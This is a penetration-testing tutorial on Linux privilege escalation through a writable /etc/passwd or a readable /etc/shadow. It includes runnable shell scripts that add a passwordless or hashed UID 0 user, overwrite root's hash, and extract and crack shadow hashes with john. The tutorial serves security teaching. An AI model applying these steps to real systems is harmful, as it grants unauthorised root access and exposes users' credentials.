Files Privilege Escalation - Linux PE.
Linux privilege escalation: sensitive files.
There are various sensitive files on a Linux system whose permissions, when misconfigured, can lead to privilege escalation. Some of these cases are detailed below.
/etc/passwd
If we have write permissions on the /etc/passwd file we can perform two different types of attack.
Creating a new user.
We can simply append a new user with root privileges (UID 0) to the file.
The new line is built field by field, separated by colons:
pentester
-> Username.
(empty)
-> Password field. Left empty, no password is required; if the target's PAM configuration refuses empty passwords, put a hash generated with openssl passwd here instead.
0
-> User ID (UID). UID 0 means our user has superuser privileges.
0
-> Group ID (GID). GID 0 means we are part of the root group.
,,,
-> GECOS (comment) field, left empty.
/
-> Home directory.
/bin/bash
-> User shell.
The resulting entry, appended to /etc/passwd:
pentester::0:0:,,,:/:/bin/bash
Changing root password.
The second technique is very similar; the difference is that instead of creating a new user we change root's password. On our local machine we run openssl to generate the hash of the new password:
openssl passwd <newPassword>
Then we replace the x in root's password field in /etc/passwd with that hash and switch user with su. The default algorithm of openssl passwd depends on the OpenSSL version (the legacy DES crypt truncates the password to 8 characters), so pass -6 (SHA-512) or -1 (MD5) explicitly, and make sure the hash is pasted on a single line without adding extra colons.
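The two /etc/passwd techniques above as a runnable shell script (an added example, not code from the original page). It works on a constructed copy of /etc/passwd so it can be executed safely; the function names, the demo user pentester and the password Passw0rd! are this example's own choices. It assumes a POSIX sh with awk and, for hashing, OpenSSL 1.1.1 or later, whose `passwd -6` option produces a SHA-512-crypt hash.

```shell
#!/bin/sh
# Added example (not from the original page): builds the /etc/passwd entries
# described above and applies them to a *copy* of the file so it is safe to
# run; on a target you would point the functions at /etc/passwd itself.
# Assumes: POSIX sh, awk, and openssl >= 1.1.1 (for `openssl passwd -6`).

# Check: is the passwd file writable by the current user? (exit 0 = yes)
passwd_writable() {
    [ -w "${1:-/etc/passwd}" ]
}

# SHA-512-crypt hash of a password. -6 is passed explicitly because the
# default algorithm of `openssl passwd` differs between OpenSSL versions and
# the legacy DES crypt silently truncates the password to 8 characters.
make_hash() {
    openssl passwd -6 "$1"
}

# Technique 1: a new UID 0 / GID 0 user line. Field 2 is the password hash;
# an empty field means "no password", which some PAM setups (pam_unix
# without nullok) refuse, so a real hash is more reliable than an empty one.
make_root_user_entry() {
    # $1 = username, $2 = password hash (may be empty)
    printf '%s:%s:0:0:,,,:/:/bin/bash\n' "$1" "$2"
}

append_entry() {
    # $1 = passwd file, $2 = complete entry line
    printf '%s\n' "$2" >> "$1"
}

# Technique 2: replace the `x` in root's password field with our own hash.
# Prints the rewritten file on stdout; the caller redirects it.
set_root_hash() {
    # $1 = passwd file, $2 = password hash
    awk -F: -v OFS=: -v h="$2" '$1 == "root" { $2 = h } { print }' "$1"
}

# Demo against a constructed copy (sample data, not a real system file).
demo() {
    tmp=$(mktemp)
    printf 'root:x:0:0:root:/root:/bin/bash\nbob:x:1000:1000:bob:/home/bob:/bin/bash\n' > "$tmp"
    if passwd_writable "$tmp"; then
        hash=$(make_hash 'Passw0rd!')
        append_entry "$tmp" "$(make_root_user_entry pentester "$hash")"
        set_root_hash "$tmp" "$hash" > "$tmp.new" && mv "$tmp.new" "$tmp"
    fi
    cat "$tmp"   # on a real target, follow with: su pentester  (or su root)
    rm -f "$tmp"
}

if [ "${RUN_DEMO:-0}" = 1 ]; then demo; fi
```

Run it with `RUN_DEMO=1 sh passwd_pe.sh` to see both modified entries; the awk in `set_root_hash` rebuilds only the root line, so every other user keeps its `x` and remains unaffected.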
/etc/shadow Privilege Escalation.
If we can read the /etc/shadow file we can try to crack the users' password hashes offline.
Detection.
In the following scenario we can see that we have read permissions on the /etc/shadow file, which by default is readable only by root and the shadow group.
Exploitation.
Obtaining the hashes.
We need to get the line in /etc/shadow for the user we want to crack, and then the corresponding line from /etc/passwd:
We have to send both lines (or the whole files) back to our system; the transfer technique depends on the situation we are facing.
Unshadowing
Once on our attacking machine we combine the two files with unshadow, which replaces the x in each /etc/passwd entry with the hash from /etc/shadow so that john can read it:
Cracking hashes.
Finally we brute-force the hashes with john.
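The readable-/etc/shadow workflow above, from the permission check through the unshadow step and the john invocation, as a runnable shell script (an added example, not code from the original page). It runs against constructed sample files; the user pentester, the demo password Summer2020 and the function names are this example's own choices. The merge is written in awk to show what unshadow does; john is only called if it is installed, and openssl is used only to produce a genuine hash for the demo.

```shell
#!/bin/sh
# Added example (not from the original page): the readable-/etc/shadow
# workflow. Runs against constructed sample files so it is safe to execute;
# on a target, point the functions at /etc/passwd and /etc/shadow.
# Assumes POSIX sh and awk; john and openssl are optional (used in demo only).

# Detection: /etc/shadow is normally mode 0640 root:shadow, so a readable
# copy is the finding. Exit status 0 when the file can be read.
shadow_readable() {
    [ -r "${1:-/etc/shadow}" ]
}

# Obtaining the hashes: pull one user's line from a passwd- or shadow-style
# file ($1 = file, $2 = username).
user_line() {
    grep "^$2:" "$1"
}

# Unshadowing: what `unshadow passwd shadow` does, written in awk. For every
# passwd line whose user has a shadow entry, field 2 (the `x`) is replaced by
# the hash from shadow; users without a shadow entry are printed unchanged.
unshadow_merge() {
    # $1 = passwd file, $2 = shadow file
    awk -F: -v OFS=: '
        NR == FNR { hash[$1] = $2; next }   # first file (shadow): build map
        ($1 in hash) { $2 = hash[$1] }      # second file (passwd): swap the x
        { print }
    ' "$2" "$1"
}

# Cracking: john detects the crypt format from the merged file. Entries whose
# hash is "!" or "*" are locked accounts and are skipped by john anyway.
crack() {
    # $1 = merged (unshadowed) file, $2 = wordlist
    command -v john >/dev/null 2>&1 || { echo 'john not installed' >&2; return 1; }
    john --wordlist="$2" "$1" && john --show "$1"
}

# Demo with constructed files (sample data, not from a real system).
demo() {
    dir=$(mktemp -d)
    printf 'root:x:0:0:root:/root:/bin/bash\npentester:x:1000:1000:,,,:/home/pentester:/bin/bash\n' > "$dir/passwd"
    # A real SHA-512-crypt hash of the demo password when openssl is present,
    # otherwise a placeholder (not a valid hash) that john will simply skip.
    h=$(openssl passwd -6 'Summer2020' 2>/dev/null || echo '$6$placeholder$notarealhash')
    printf 'root:!:19000:0:99999:7:::\npentester:%s:19000:0:99999:7:::\n' "$h" > "$dir/shadow"
    shadow_readable "$dir/shadow" || return 1
    user_line "$dir/shadow" pentester         # the line we would copy out
    user_line "$dir/passwd" pentester
    unshadow_merge "$dir/passwd" "$dir/shadow" > "$dir/unshadowed.txt"
    printf 'letmein\nSummer2020\n' > "$dir/words.txt"
    crack "$dir/unshadowed.txt" "$dir/words.txt"
    rm -rf "$dir"
}

if [ "${RUN_DEMO:-0}" = 1 ]; then demo; fi
```

Run it with `RUN_DEMO=1 sh shadow_pe.sh`; with john and openssl installed the demo ends with john recovering Summer2020 for pentester, while root's locked `!` entry is ignored. On a real engagement, replace the two constructed files with the lines copied from the target.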